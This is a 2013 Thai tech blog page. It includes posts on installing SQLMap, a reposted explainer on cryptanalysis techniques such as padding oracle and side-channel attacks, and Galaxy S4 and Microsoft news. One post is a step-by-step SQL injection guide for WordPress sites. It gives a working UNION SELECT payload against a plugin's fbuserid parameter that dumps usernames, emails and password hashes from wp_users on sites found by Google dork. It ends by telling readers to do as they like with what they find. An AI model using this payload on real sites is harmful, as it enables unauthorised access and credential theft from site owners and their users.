หน้าเว็บ

Thursday, August 29, 2013

การติดตั้ง SQLMap on linux

การติดตั้ง SQLMap on linux
สวัสดีครับพบกันอีกครั้งน่ะครับกับการติดตั้ง SQLMap on linux เอาล่ะก่อนที่เราจะติดตั้ง SQLMap เรามารู้จักกับ SQLMap กันก่อนน่ะครับ SqlMap คือเครื่องมือช่วยในการทำ SQL Injection ชนิดหนึ่งที่มีความจำเป็นมาก(สำหรับผม)ที่ใช้ประกอบในการทำ SQL Injection ซึ่งเครื่องมือนี้เป็นเครื่องมือที่ใช้งานง่ายและก็สะดวกด้วยถึงแม้ขั้นตอนการติดตั้งจะค่อนข้างยากบ้างนิดหน่อย(สำหรับบางท่าน)เอาล่ะพร่ำมาเยอะแล้วเดียวเรามาดูขั้นตอนการติดกันเลยเออก่อนจะติดตั้งผมขอแนะนำให้โหลด SQLMap มาเก็บไว้ที่เครื่องก่อนน่ะครับ
ตามลิงค์นี้ "Download SQLMap" เลยสำหรับขั้นตอนการติดตั้งSQLMapผมขอใช้วิดีโอที่ผมทำการบันทึกไว้น่ะครับ
คือขี้เกียจพิมพ์บรรยาย ฮ่าๆๆ หากท่านดูแล้วไม่รู้เรื่องก็คอมเม้นมาได้เหมือนเคยน่ะครับเดียวผมจะตอบให้ตามความประสงค์ของท่านน่ะครับ จึงเรียนมาเพื่อทรบมาน่ะโอกาศนี้ด้วยเหอะๆ



 

Wednesday, August 28, 2013

วิธีทำ SQL Injection on Wordpress ภาควิดีโอ

วิธีทำ SQL Injection on Wordpress ภาควิดีโอครับ



หากดูแล้วไม่เข้าใจตามลิงค์นี้เลยครับ

Tuesday, August 27, 2013

วิธีทำ SQL Injection on Wordpress Blog


สวัสดีครับเพื่อนทุกท่านวันนี้ผมก็ขอเสนอบทความเกียวกับเรื่องความปลอดภัยของ Weblog ยอดนิยมย่าง Wordpress กันน่ะครับ ก่อนอื่นต้องขอแนะนำก่อนว่าบทความนี้เป็นบทความทดสอบเรื่องความปลอดภัยน่ะครับไม่ใช้บทความเกียวกับการแฮกน่ะ โปรดใช้วิจารนญาณ ในการการอ่านและปฏบัติด้วยน่ะครับ

เอาล่ะเมื่อพอจะเข้าใจกันแล้วเรามาเริ่มกันเลยดีกว่าแต่เดียวก่อนอื่นเราต้องมี google dork กันก่อนน่ะครับ

Step 1 : เข้าไปที่
http://www.google.com

Step 2:เสร็จแล้วก็ทำการค้นหาด้วยคำนี้









 

Step 3: เสร็จแล้วเราก็เลือกเอาสักเว็บนึง เมื่อเราคลิกเข้าไปแล้วก็จะแสดงเหมือนดังรูปนี้

You will find something like that.

Step 4: จากนั้นก็ทำการเปลี่ยนจาก
?fbconnect_action=myhome&userid=

เป็น


?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email,user_pass) ​,7,8,9,10,11,12+from+wp_users--


Step 5: จากนั้นสิ่งที่เราไม่อยากเห็นก้จะแสดงขึ้นมาตามรูปนี้เลยครับ


Step 6: ใครเจออะไรก้จัดการเอาเองน่ะตัวใครตัวมันฮ่าๆ
เอาล่ะครับใครไม่เข้าใจอันไหนก้คอมเม้นมาได้เลยน่ะครับยินดีตอบจร้า

Tuesday, August 13, 2013

กระบวนการถอดรหัส

SSL


กระบวนการถอดรหัสที่มีอยู่ในโลกมากมายและถูกพัฒนาอย่างต่อเนื่องจน ทุกวันนี้ซับซ้อนในระดับที่ต้องการความรู้คณิตศาสตร์ระดับสูง เหตุผลสำคัญของการพัฒนาเหล่านี้คือการแข่งขันกับกระบวนการถอดรหัสที่พัฒนา อย่างต่อเนื่องเช่นเดียวกันศาสตร์ที่ว่าด้วยการถอดรหัสนี้เรียกว่า Cryptanalysis เป็นศาสตร์ที่อยู่คู่กับการเข้ารหัสมานาน เทคนิคและกระบวนการก็ซับซ้อนและใช้ในกรณีเฉพาะบางอย่างไปเรื่อยๆ



ในบทความนี้เราจะยกตัวอย่างบางเทคนิคที่ใช้กันในการถอดรหัส

ความถี่ของข้อมูล (Frequency Counting)




นับตั้งแต่การเข้ารหัสของซีซาร์เมื่อสองพันปีก่อน ที่เข้ารหัสง่ายๆ ด้วยการแทนตัวอักษรตามตารางลับทำให้ข้อความอ่านไม่ออก การโจมตีที่ง่ายที่สุดคือการดูว่าตัวอักษรที่ถูกใช้งานมากที่สุดคือตัวอักษร ใด แล้วแทนตัวอักษรนั้นด้วยตัว e ตัวที่รองลงมาน่าจะเป็น t หรือ a ไปตามลำดับ



การแทนตัวอักษรตามตารางของซีซาร์นั้นแสดงให้เห็นปัญหาของการเข้ารหัส ข้อความเดิมแล้วได้ผลของการเข้ารหัสที่เหมือนเดิม เมื่อข้อมูลใหญ่ขึ้นเรื่อยๆ เราจะเห็นปัญหาของการเข้ารหัสเช่นนี้ เช่นภาพตัวอย่าง

กระบวนการนับความถี่อาศัยความจริงพื้นฐานว่าข้อมูลที่เราเข้ารหัสไปนั้น มักมีข้อมูลบางรูปแบบที่ใช้ซ้ำไปบ่อยกว่าข้อมูลแบบอื่นๆ ทุกวันนี้ แม้การใช้งานอินเทอร์เน็ตจะซับซ้อนกว่าตัวอักษร 26 ตัวอักษรแล้ว แต่รูปแบบการใช้งานยังคงคล้ายเดิมอย่างมาก เราจะพบว่าข้อความบางรูปแบบถูกใช้ซ้ำไปมา รูปแบบของการนับความถี่ในยุคใหม่พัฒนาไปจากเดิมมาก เนื่องจากการเข้ารหัสยุคใหม่ๆ นั้นไม่ปล่อยให้ข้อมูลที่เหมือนเดิมเข้ารหัสแล้วได้ข้อความเดิมอีกต่อไปแล้ว การนับความถี่อาจจะอาศัยข้อมูล เช่น ขนาดของข้อมูล, ระยะเวลาของห้วงการส่งข้อมูลแต่ละครั้ง (time interval) สิ่งเหล่านี้แม้ไม่ได้เปิดเผยข้อมูลภายในตัวมันเอง แต่สามารถนำไปสังเกตเพื่อหาข้อมูลเพิ่มเติมบางอย่างได้ เช่น ผู้ร้ายที่ดักฟังข้อมูลอยู่ อาจจะคาดเดาได้ว่ามีการเปิดหน้าเว็บใด แม้จะเชื่อมต่อ VPN ไว้ก็ตามที

Brute-Force


กระบวนการเข้ารหัสที่ถูกต้องแม้จะใช้พลังประมวลผลในการเข้ารหัส ต่ำกว่าพลังประมวลผลสำหรับการรหัสอย่างมาก แต่หลายครั้งที่พลังประมวลผลเพื่อถอดรหัสกลับไม่ได้สูงจนกระทั่งคนทั่วไป (หรือหน่วยงานที่มีทุนสูงเช่นรัฐบาล) จะสามารถจัดหาได้

การโจมตีแบบ Brute-Force ที่สำคัญคือการโจมตีอัลกอริธึม DES ที่มีขนาดกุญแจ 56 บิต หลังจากที่ไอบีเอ็มได้ออกแบบให้ใช้กุญแจขนาด 112 บิตในตอนแรก และถูกร้องขอโดย NSA (เจ้าของเดียวกับ PRISM และ XKeyscore) ให้ลดขนาดกุญแจเหลือครึ่งเดียวโดย DES กลายเป็นมาตรฐานในปี 1975 และถูกใช้เข้ารหัสฐานข้อมูลจำนวนมาก ทั้งข้อมูลทางการเงิน, สมาร์ตการ์ด, และเอกสารลับของรัฐบาล

โดยตัวคุณสมบัติทางคณิตศาสตร์เอง DES ไม่ได้มีปัญหาอะไรมากนัก นอกจากขนาดกุญแจที่เล็กเกินไป และคอมพิวเตอร์มีความเร็วเพิ่มขึ้นอย่างรวดเร้ว ภายในเวลาเพียง 20 ปี DES ก็ถูกรหัสได้ภายในไม่กี่วันด้วยคอมพิวเตอร์เฉพาะทางราคา 220,000 ดอลลาร์ แสดงให้เห็นว่ามันอ่อนแอเกินไปที่จะรักษาข้อมูลที่มีมูลค่าสูง

การถอดรหัสแบบ Brute-Force คือ การทดลองทุกกุญแจที่เป็นไปได้ แล้วนำมาถอดรหัสข้อมูลลับดูว่าจะได้ผลว่าอย่างไร แต่ความยากของกระบวนการเช่นนี้ คือกุญแจทุกชุดที่นำมาถอดรหัสนั้นล้วนใช้งานได้ทั้งสิ้น และสามารถถอดรหัสออกมาเป็นข้อมูลอีกชุด กระบวนการที่ยากอย่างหนึ่งคือการตรวจสอบผลลัพธ์ว่าเราได้พบกับข้อมูลที่ ถูกต้องแล้วหรือไม่ ดังนั้นแม้จะสามารถไล่ทุกกุญแจได้อย่างรวดเร็ว แต่ก็ต้องมีความรู้เกี่ยวกับข้อมูลอยู่บ้าง เช่น ไฟล์หลายชนิดมักกำหนดข้อมูล checksum เพื่อตรวจสอบความถูกต้องของไฟล์ไว้ หากถอดรหัสแล้วสามารถตรวจค่า checksum ได้ถูกต้องก็แสดงว่าเราเจอกับกุญแจที่ถูกต้องแล้ว

บทเรียนที่สำคัญอย่างหนึ่งของ DES คือการประมาณเวลารักษาข้อมูลด้วยการเข้ารหัส ทุกวันนี้เรามักเห็นการประมาณเวลาการโจมตีการเข้ารหัสไว้ว่าใช้เวลาในการถอด รหัสด้วยซีพียูเป็นเวลานานเท่าใด แม้ส่วนมากมักใช้เวลาเกิน 10 ปี ในซีพียูรุ่นใหม่ล่าสุด แต่กระบวนการพัฒนาซีพียูที่ทำความเร็วเพิ่มขึ้นในรูปแบบ exponential ทำให้ซีพียูจะมีพลังประมวลผลเร็วขึ้นสองเท่าในช่วงเวลาประมาณ 18 เดือนเท่านั้น การประมาณเวลาว่าจะใช้เวลาถอดรหัสถึงสิบปี จะเหลือระยะเวลาถอดรหัสเพียง 5 ปีเมื่อใช้ซีพียูรุ่นใหม่ในอีก 18 เดือนข้างหน้า และเหลือ 2.5 ปีในอีกสามปีข้างหน้าเท่านั้น

แนวทางการใช้เทคโนโลยีรูปแบบใหม่ๆ เช่น ระบบประมวลผลแบบกลุ่มเมฆก็เป็นปัจจัยต่อการเข้ารหัส ในยุคหนึ่งการซื้อคอมพิวเตอร์นับพันๆ ตัวเพื่อถอดรหัสเป็นเรื่องที่ใช้ต้นทุนสูง และผู้กระทำต้องเป็นองค์กรที่มีทุนสูงเท่านั้น แต่ทุกวันนี้กระมวลผลแบบกลุ่มเมฆทำให้คนทั่วไปที่มีทุนอยู่บ้าง สามารถเข้าถึงฮาร์ดแวร์จำนวนมากมายได้โดยไม่ต้องลงทุนค่าเครื่องเอง เมื่อระยะเวลาถอดรหัสด้วยกุญแจที่ใช้พลังประมวลผลถึงสิบปี จะใช้เวลาไม่ถึงวันหากใช้เครื่องจำนวนมากประมวลผลขนานกันสี่ถึงห้าพัน เครื่อง ซึ่งอาจเช่าใช้ได้ทันทีด้วยเงินทุนเพียงไม่กี่แสนบาท

Known Plaintext


การเข้ารหัสนั้นมักจะตั้งสมมติฐานว่าคนที่เราไม่ต้องการให้รู้ข้อความ นั้นไม่รู้ข้อความอยู่ก่อนหน้า (ไม่อย่างนั้นเราจะเข้ารหัสทำไม?) และไม่รู้กุญแจลับที่เราใช้เข้ารหัส แต่จะเกิดอะไรขึ้นถ้าผู้โจมตีกลับรับรู้ข้อความอยู่ก่อนแล้ว

ในกรณีของการเข้ารหัสแบบซีซาร์ การที่ผู้โจมตีรู้ข้อความอยู่ก่อนจะทำให้ความลับที่หลุดออกมาทันที ผู้โจมตีสามารถสร้างตารางแทนตัวอักษรของซีซาร์ได้โดยง่าย การใช้งานข้อความที่รู้อยู่ก่อนแล้วถูกใช้งานจริงจังเมื่อการถอดรหัส enigma ในช่วงสงครามโลกครั้งที่สอง นักวิเคราะห์พบว่าข้อความส่วนมากที่ส่งด้วย enigma นั้นคือเลข 1 หรือ eins โดยมีคำนี้อยู่ในข้อความถึงร้อยละ 90 แสดงว่าเมื่อเราถอดรหัสออกมาได้แล้วก็ให้ลองหาคำว่า eins นี้ดู ถ้าพบแสดงว่าข้อความน่าจะถูกต้องแล้ว Alan Turing สร้าง eins catalogue เพื่อเตรียมข้อความที่เข้ารหัสคำว่า eins ในทุกรูปแบบของกุญแจเครื่อง enigma นำไปสู่การถอดรหัสในที่สุด

ข้อความที่รู้อยู่ก่อนนั้นเกิดขึ้นได้ในหลายรูปแบบ ในกรณีของสงครามโลกครั้งที่สอง ทหารเยอรมันส่งข้อความที่ไม่สำคัญนักไปยังศูนย์กลางโดยการเข้ารหัสอื่นๆ นอกจาก enigma จากนั้นศูนย์จึงส่งกลับฐานทัพด้วย enigma อีกครั้ง ฝ่ายสัมพันธมิตรจึงสามารถรับรู้ข้อความก่อนและหลังเข้ารหัสด้วย enigma ได้

การใช้งานที่ซับซ้อนขึ้น เช่น ในยุคของการออกแบบ DES ใหม่ให้มีความปลอดภัยสูงขึ้น มีผู้เสนอกระบวนการ 2DES คือการเข้ารหัสด้วย DES สองรอบ โดยใช้กุญแจขนาด 112 บิต กระบวนการนี้ดูมีความปลอดภัยดีเพราะ DES เองก็ไม่มีปัญหาอื่นนอกจากขนาดกุญแจเล็กเกินไป

ปรากฎว่าในกรณีที่ผู้โจมตีรู้ข้อความอยู่ก่อน เขาสามารถสร้างข้อความในทุกกรณีด้วยกุญแจขนาด 56 บิต ได้คลังขนาด 2^56 กรณีเตรียมไว้ก่อนได้ และถอดรหัสข้อความที่เข้ารหัสแล้วด้วยกุญแจขนาด 56 บิตอีกรอบแล้วนำไปค้นดูในคลัง ว่ามีกุญแจที่รู้อยู่ก่อนแล้วหรือไม่ กระบวนการเช่นนี้ทำให้ความยุ่งยากของการคำนวณอยู่ในระดับ 2^57 ซึ่งไม่ดีกว่ากุญแจ DES เดิมมากนัก ชื่อเรียกเฉพาะของการโจมตีเช่นนี้เรียกว่า meet-in-the-middle attack

Padding Oracle: บางครั้งเซิร์ฟเวอร์ก็สร้างปัญหา


กระบวนการโจมตีในรูปแบบใหม่ๆ ที่กระบวนการทางคณิตศาสตร์ได้รับการพัฒนาไปมาก แต่กลับมีการใช้งานในรูปแบบที่หลากหลายขึ้น กระบวนการที่สำคัญได้แก่ padding oracle มันอาศัยการใช้งานในกรณีที่ผู้ใช้ทั่วไปสามารถถือข้อความที่เข้ารหัสแล้ว แต่ไม่รู้ว่าข้อความนั้นคืออะไร และมีเซิ์ฟเวอร์รับข้อความเข้ารหัสเพื่อส่งผลลัพธ์ของข้อความที่เข้ารหัส นั้น





ในโหมดการเข้ารหัสแบบ block cipher ในโหมด CBC นั้นกำหนดให้ส่งค่าเริ่มต้นการเชื่อมต่อ (initial vector – IV) เป็นค่าสุ่มและส่งออกมาอย่างเปิดเผย จากนั้นจึงใช้ค่านี้ไป XOR กับข้อมูล “ก่อนเข้ารหัส” ในกระบวนการถอดรหัส และ “หลังถอดรหัส” ในกระบวนการถอดรหัส (ดูภาพ) จากนั้นจึงใช้ข้อความที่เข้ารหัสแล้ว ไปใช้ XOR เช่นเดิมกับบล็อคต่อๆ ไป กระบวนการนี้ทำให้ข้อความแม้จะเหมือนเดิม แต่หากค่า IV ต่างกันก็จะได้ข้อความที่ต่างกันไป

ในกระบวนการแบบ CBC นั้น โปรโตคอล TLS ระบุให้สามารถส่งข้อความยาวเท่าใดก็ได้โดยไม่ต้องสนใจขนาดบล็อคของแต่ละอัล กอลิทึม เนื่องจากแต่ละอัลกอลิทึมมีขนาดบล็อคต่างกันไป โดยเมื่อส่งข้อมูลทุกครั้ง จะต้องลงท้ายข้อมูล (padding) ด้วยข้อมูลที่ระบุว่ามีกี่ไบต์ที่ไม่ใช้งาน เช่น บล็อคขนาด 8 ไบต์ แต่ต้องการส่งข้อมูล 7 ไบต์ จะต้องส่งข้อมูลเป็น \x01 ต่อท้าย เช่น “\xAB\xAB\xAB\xAB\xAB\xAB\xAB\x01″ หรือแม้แต่ข้อมูลที่ขนาดเท่าบล็อคพอดีก็ต้องเพิ่มอีกหนึ่งบล็อคเป็นข้อมูล เติมเต็มเสมอ เช่น “\xAB\xAB\xAB\xAB\xAB\xAB\xAB\xAB\x08\x08\x08\x08\x08\x08\x08\x08″ เป็นข้อมูลในกรณีที่บล็อคเข้ารหัสมีขนาด 8 ไบต์และต้องการส่งข้อมูลขนาด 8 ไบต์พอดี

ในกรณีบล็อคแรกแม้ผู้โจมตีจะรู้เสมอว่าค่า IV และข้อมูลที่เข้ารหัสแล้วเป็นอะไร แต่เนื่องจากไม่รู้กุญแจการเข้าและถอดรหัส ทำให้ไม่รู้ค่าตรงกลางหลังจากข้อมูลถอดรหัสแล้ว ก่อนที่จะมา XOR กับค่า IV

กระบวนการเช่นนี้ใช้มานานและดูจะปลอดภัยดี จนกระทั่งพบว่าเซิร์ฟเวอร์จำนวนมาก มักส่งข้อความตอบกลับแจ้งว่าข้อมูลต่อท้ายนั้นผิดพลาด (invalid padding)

แทนที่จะโจมตีการเข้ารหัสโดยตรง ผู้โจมตี เลือกที่จะตัดเฉพาะบล็อคแรกออกมา แล้วส่งไปใหม่ 256 ครั้ง โดยเปลี่ยนไบต์สุดท้ายของค่า IV ให้มีค่าที่เป็นไปได้ทุกกรณีจำนวน 256 ค่า เกือบทุกค่าเซิร์ฟเวอร์จะแจ้งกลับว่าข้อมูลต่อท้ายนั้นผิดพลาดเสมอ ยกเว้นกรณีที่ไบต์สุดท้ายเป็นค่า \x01 พอดี ที่เซิร์ฟเวอร์จะตอบกลับว่าข้อมูลนี้ถูกต้องแล้ว (มีกรณีอื่นที่เซิร์ฟเวอร์ตอบถูกต้องเช่นกัน คือกรณีไบต์รองสุดท้าย เป็น \x02 พอดี และข้อมูลในไบต์สุดท้ายเป็น \x02 ด้วย แต่กรณีเหล่านั้นมีความเป็นไปได้น้อย และตัดออกได้ง่าย) การตอบว่าข้อมูลถูกต้อง ทำให้ผู้โจมตีรับรู้ได้ทันทีว่าค่าตรงกลางหลังการถอดรหัสแล้วคือค่าอะไร และเมื่อไปดูค่า IV ดั้งเดิมที่ถูกต้อง เขาก็รู้ได้เช่นกันว่าข้อความเดิมก่อนเข้ารหัสในไบต์สุดท้ายคืออะไร

เมื่อผู้โจมตีรู้ค่าของไบต์สุดท้ายแล้ว เขาสามารถวนไปยังไบต์รองสุดท้ายเพื่อเปลี่ยนค่า IV เป็นอีก 256 กรณีได้เช่นเดิม โดยเปลี่ยนค่าของไบต์สุดท้ายให้ถอดรหัสได้ \x02 เตรียมไว้ล่วงหน้า เมื่อวนเช่นนี้ครบทั้งบล็อคก็จะถอดรหัสทั้งบล็อคได้ การถอดรหัสบล็อคต่อไปก็อาศัยการเปลี่ยนข้อความที่เข้ารหัสแล้วเช่นเดิมไป เรื่อยๆ โดยส่งข้อมูลหาเซิร์ฟเวอร์เพิ่มทีละบล็อค

Side-Channel Attack: มันไม่เกี่ยวทำให้เกี่ยวยังไงไหว


โลกของงานวิจัยการถอดรหัสในช่วงสิบปีที่ผ่านมาก้าวหน้าไปอย่างรวดเร็ว หัวข้องานวิจัยใหม่ๆ เริ่มปรากฎกรณีที่ไม่เคยมีคนคิดมาก่อน กระบวนการสำคัญคือการคิดถึงปัจจัยที่ไม่เคยคิดกันมาก่อน เช่น การใช้ขนาดของข้อมูลหลังการเข้ารหัส, พลังงานที่ใช้ในการเข้ารหัส, หรือระยะเวลาการเข้ารหัส

การใช้ขนาดของข้อมูลเป็นประเด็นสำคัญอย่างมากในช่วงหลัง เนื่องจากความซับซ้อนของโปรโตคอลอย่าง HTTP เริ่มมีมากขึ้นเรื่อยๆ มีการใช้มาตรฐานต่างๆ ประกอบกันมากมาย ในกระบวนการโจมตี CRIME อาศัยการบีบอัดข้อมูลของ TLS จากความสามารถของเบราว์เซอร์ที่เปิดให้เว็บหนึ่งๆ สามารถควบคุมเบราว์เซอร์ให้เรียกเว็บอื่นๆ ได้อย่างอิสระ พร้อมกับใส่ข้อมูลที่ต้องการเข้าไปได้ เว็บที่โจมตีเว็บอื่นด้วย CRIME จึงใส่ข้อมูลที่คาดว่าจะมีอยู่ในเนื้อหาของเว็บปลายทาง เช่น คำว่า “Cookie:” เข้าไปในข้อความที่เรียก แล้วดูผลลัพธ์ว่าขนาดผลลัพธ์มีขนาดเท่าใด จากนั้นจึงค่อยๆ เพิ่มทีละตัวอักษรว่าข้อมูลมีขนาดเพิ่มขึ้นหรือเท่าเดิม หากเท่าเดิมแสดงว่ากระบวนการบีบอัดข้อมูลทำงาน และตัวอักษรที่เพิ่มขึ้นนั้นถูกต้องดีแล้ว

กระบวนการวิเคราะห์พลังงานในการเข้ารหัสนั้น แม้จะไม่ได้ใช้ในระบบคอมพิวเตอร์ทั่วไปที่เราเข้าวัดพลังงานโดยตรงไม่ได้ แต่ในระบบการเข้ารหัสใหม่ๆ เช่น สมาร์ตการ์ด ผู้โจมตีสามารถเข้าวัดพลังงานของคอมพิวเตอร์ในการ์ดได้อย่างแม่นยำ กระบวนการนี้อาศัยการวิเคราะห์ว่ากุญแจเข้ารหัสแบบใดจะใช้พลังงานต่างกันมาก น่อยเพียงใด เพื่อพยายามเดากุญแจการเข้ารหัสภายในตัวการ์ดที่ไม่สามารถอ่านได้

การอาศัยเวลานั้นคล้ายกับการวิเคราะห์พลังงาน คือ เมื่อเราตรวจสอบกระบวนการเข้ารหัสแล้ว เราสามารถดูได้ว่ากุญแจรูปแบบใดน่าจะทำให้ระยะเวลาการเข้ารหัสนั้นสั้นยาว ต่างกัน กระบวนการนี้สามารถใช้ได้กับการใช้งานแบบเซิร์ฟเวอร์ที่เรารอระยะตอบกลับได้ อีกด้วย แต่เครือข่ายต้องมีความเสถียรสูงมาก เพื่อจะวัดระยะเวลาตอบกลับจากเซิร์ฟเวอร์ได้อย่างแม่นยำ

โลกของกระบวนการถอดรหัสยังมีกระบวนการอื่นๆ อีกมากมาย กระบวนการใหม่ๆ ยังได้รับการเสนอออกมาอย่างต่อเนื่อง และการแก้ไขเองก็มีออกมาไล่กันไปสำหรับคนส่วนใหญ่แม้จะเป็นนักพัฒนาก็ตาม มักจะอยู่ในฐานะผู้ใช้ของกระบวนการเหล่านี้ เราควรติดตามข่าวสารของเทคนิคใหม่ๆ และแนวทางแก้ไขหรือลดปัญหาที่มักจะมีออกมาใกล้ๆ กัน

ที่มา blognone



กระบวนการถอดรหัส

กระบวนการถอดรหัสที่มีอยู่ในโลกมากมายและถูกพัฒนาอย่างต่อเนื่องจน...
คอละคังดอทคอม
korelakung.com

Tuesday, March 19, 2013

ไมโครซอฟท์เปิดร้านในเว็บไซต์ Tmall


Microsoft
ไมโครซอฟท์ได้เปิดหน้าร้านของตนเองบนเว็บไซต์ขายของที่ใหญ่ที่สุดในจีนคือ Tmall ซึ่งเป็นเว็บไซต์ที่บริหารโดยบริษัท Alibaba โดยจะขายผลิตภัณฑ์ของไมโครซอฟท์กว่า 50 อย่าง ได้แก่ Surface, Office, โทรศัพท์ Windows Phone และอุปกรณ์ PC ต่างๆ ของไมโครซอฟท์
การเปิดหน้าร้านใน Tmall นั้นจะทำให้กลุ่มลูกค้าในจีนสามารถเข้าถึงผลิตภัณฑ์ของไมโครซอฟท์ได้มากขึ้นซึ่งเป็นกลยุทธ์ในการกระตุ้นยอดขายของไมโครซอฟท์ที่ค่อนข้างซบเซาในจีน โดย Surface RT นั้นมีส่วนแบ่งตลาดในจีนอยู่ที่ 1% ในขณะที่ iPad นั้นมีส่วนแบ่งอยู่ที่ 62% และแท็บเล็ต Android อยู่ที่ 36% ครับ
ที่มา - TechCrunch blognone.com

Galaxy S4 รุ่นอเมริกาเหนือและยุโรปใช้ Snapdragon 600


Galaxy S4
เกริ่นเอาไว้ตั้งแต่งานเปิดตัวแล้วว่า Galaxy S4 จะใช้ซีพียูสองตัวคือ Exynos Octa กับ Snapdragon 600 และดูเหมือนรุ่นที่ขายในอเมริกาเหนือ และยุโรปจะเป็นรุ่นที่ใช้ Snapdragon 600 ทั้งหมด
ถึงจะเป็น Snapdragon 600 เหมือนกับ HTC One คือ APQ8064T แต่เมื่อนำไปทดสอบด้วย Geekbench 2 แล้วผลปรากฏว่า Galaxy S4 นั้นทำคะแนนได้ดีกว่า HTC One พอสมควร (ประมาณ 10%-20%) และทิ้งห่าง iPhone 5 ถึงเท่าตัว ส่วนเหตุผลที่แรงกว่า HTC One ทั้งที่ใช้รุ่นเดียวกันนั้น น่าจะเป็นเพราะว่าซัมซุงเพิ่มความถี่ซีพียูจาก 1.7GHz ไปเป็น 1.9GHz นั่นเอง
พร้อมกับสเปคที่ออกมา ราคาของ Galaxy S4 ในสหรัฐฯ ก็ตามมา โดยหลุดมาจากแคมเปญของซัมซุงเอง ที่ระบุว่าเครื่องเปล่าไม่ติดสัญญาจะราคาประมาณ 579 เหรียญ และภายหลังได้แก้ราคาเป็น 650 เหรียญ ในขณะเดียวกันราคาเครื่องในอังกฤษนั้นเปิดมาที่ 529.98 ปอนด์แบบรวมภาษีแล้ว เมื่อนำมาแปลงเป็นดอลลาร์ และหักภาษีออกก็จะได้ราคาประมาณ 650 เหรียญเช่นกัน
จากราคาที่ออกมาเทียบกับ Galaxy S III จะเห็นว่า Galaxy S4 นั้นเปิดราคาถูกลงกว่าเดิมเล็กน้อย เป็นไปได้ว่าเครื่องที่ขายในไทยก็น่าจะเปิดถูกลงครับ ?
ที่มา - GSM ArenaAndroid Authority blognone.com

Galaxy S4 บุกอเมริกา


หลังงานเปิดตัว Samsung Galaxy S4 ผู้สืบทอดของสมาร์ทโฟนระดับเรือธงตระกูล Galaxy S ก็มีเสียงวิพากษ์วิจารณ์ตามมาเป็นอย่างมากทั้งในแง่บวกและแง่ลบ
ในฐานะที่ผมมีโอกาสมาร่วมงานเปิดตัว Galaxy S4 ได้ลองจับของจริง และพูดคุยกับผู้บริหารของซัมซุงอยู่บ้าง ก็อยากวิเคราะห์-วิจารณ์ทิศทางและท่าทีของซัมซุงต่อการเปิดตัว S4 ครั้งนี้ด้วยครับ
Galaxy S4
ก่อนอื่นต้องแยกแยะว่า Galaxy S4 ไม่ได้เป็นเพียงแค่ฮาร์ดแวร์โทรศัพท์ที่ใช้ระบบปฏิบัติการแอนดรอยด์ แต่มันกินความหมายครอบคลุม "แพลตฟอร์มซอฟต์แวร์และบริการ" ที่ซัมซุงกำลังสร้างขึ้น รวมไปถึงยุทธศาสตร์ทางธุรกิจ-การตลาด-การแข่งขันของทั้งซัมซุง และอุตสาหกรรมไฮเทคในภาพรวมด้วย

ดังนั้นการวิเคราะห์-วิจารณ์ คงต้องแยกเป็นประเด็นๆ ไป ซึ่งมีทั้งประเด็นที่เชื่อมโยงและไม่เชื่อมโยงกับประเด็นอื่นนะครับ

หน้าตาและการออกแบบ

สิ่งที่ซัมซุงถูกวิจารณ์มากที่สุดคงเป็น "หน้าตา" ของ Galaxy S4 ที่เหมือนกับ Galaxy S III มากจนแยกลำบาก ซึ่งทางผู้บริหารของซัมซุงก็ตอบโจทย์ว่าเป็นความจงใจที่อยากใช้ "แพลตฟอร์มการออกแบบ" ของ S III ที่ประสบความสำเร็จอย่างมาก
จากที่ผมลองไปสัมผัสเครื่องจริงมา หน้าตาเหมือนเดิม วัสดุดีขึ้น แต่ก็ยังไม่ถึงขั้น "หรูหรา" แบบเดียวกับ iPhone 5 หรือ HTC One อยู่ดี และนี่จะเป็นจุดอ่อนให้ซัมซุงถูกวิจารณ์ว่าเป็น "พลาสติกก๊อบแก๊บ" อยู่ต่อไป
ในแง่การตลาด คนที่ได้รับผลกระทบมากที่สุดคงเป็นผู้ซื้อ S4 บางกลุ่มที่รู้สึกว่า "ไม่ต่างอะไรกับ S III เลย" เวลาถือโชว์ไปมา (ซึ่งเราปฏิเสธไม่ได้ว่ามีผู้ใช้จำนวนหนึ่งที่เลือกโทรศัพท์ด้วยปัจจัยนี้) ทั้งๆ ที่ซื้อมือถือระดับเรือธงราคาแพง ประเด็นนี้แอปเปิลเข้าใจเป็นอย่างดี และเลี่ยงปัญหาเรื่อง "ความคาดหวัง" ว่ามือถือจะหน้าตาเปลี่ยนไปจากเดิมโดยตั้งชื่อรุ่นให้รู้สึกเสมือนเป็น minor change แทน
ถามว่าโดยส่วนตัวผิดหวังไหม ก็ตอบตามตรงว่าผิดหวังครับ แต่ถ้าถามว่าการออกแบบนี้มีผลอะไรกับยอดขายของ S4 หรือไม่ ผมประเมินว่าคงมีแหละ แต่ไม่น่าจะเยอะอย่างที่คาดกัน สุดท้ายแล้ว S4 น่าจะขายดีมากๆ ด้วยปัจจัยที่จะกล่าวถึงต่อไป
Galaxy S4

ฮาร์ดแวร์

ถ้าดูตามสเปก ฮาร์ดแวร์ของ S4 พัฒนาขึ้นจาก S III เกือบทุกด้าน ซีพียูใหม่และเร็วขึ้น หน้าจอละเอียดและใหญ่ขึ้น (ภายใต้ขนาดเครื่องที่เล็กลงจากเดิมนิดหน่อย) แบตเตอรี่เยอะขึ้น กล้องความละเอียดขึ้น
แต่ทั้งหมดที่ว่ามา มันเป็น "วิวัฒนาการ" ที่เพิ่มขึ้นตามระยะเวลา และเป็นสิ่งที่ทุกคนคาดเดาได้ ในแง่ความน่าตื่นเต้นคงมีไม่เยอะนัก (ที่ผมว่าใหม่จริงๆ คือเซ็นเซอร์วัดอุณหภูมิและความชื้น ซึ่งก็คงไม่ใช่ประเด็นสำคัญอยู่ดี)
อย่างไรก็ตาม ถ้าดูพัฒนาการของวงการสมาร์ทโฟนในภาพรวม เราจะเห็นว่าฝั่งฮาร์ดแวร์เองก็ไม่มีอะไรใหม่แบบก้าวกระโดดเหมือนกับ 3-4 ปีก่อนหน้านี้แล้ว ถ้าเราย้อนไปดูสมาร์ทโฟนตลอด 5-6 ปีที่ผ่านมา อัตราของนวัตกรรมฝั่งฮาร์ดแวร์เติบโตเร็วมากอย่างน่าอัศจรรย์ จนไม่น่าจะเหลือที่ว่างให้กับนวัตกรรมด้านฮาร์ดแวร์อีกสักเท่าไรนัก
